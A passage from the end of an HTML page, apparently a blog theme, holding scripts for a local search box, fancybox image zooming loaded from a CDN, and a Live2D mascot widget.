    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"left","width":170,"height":340},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
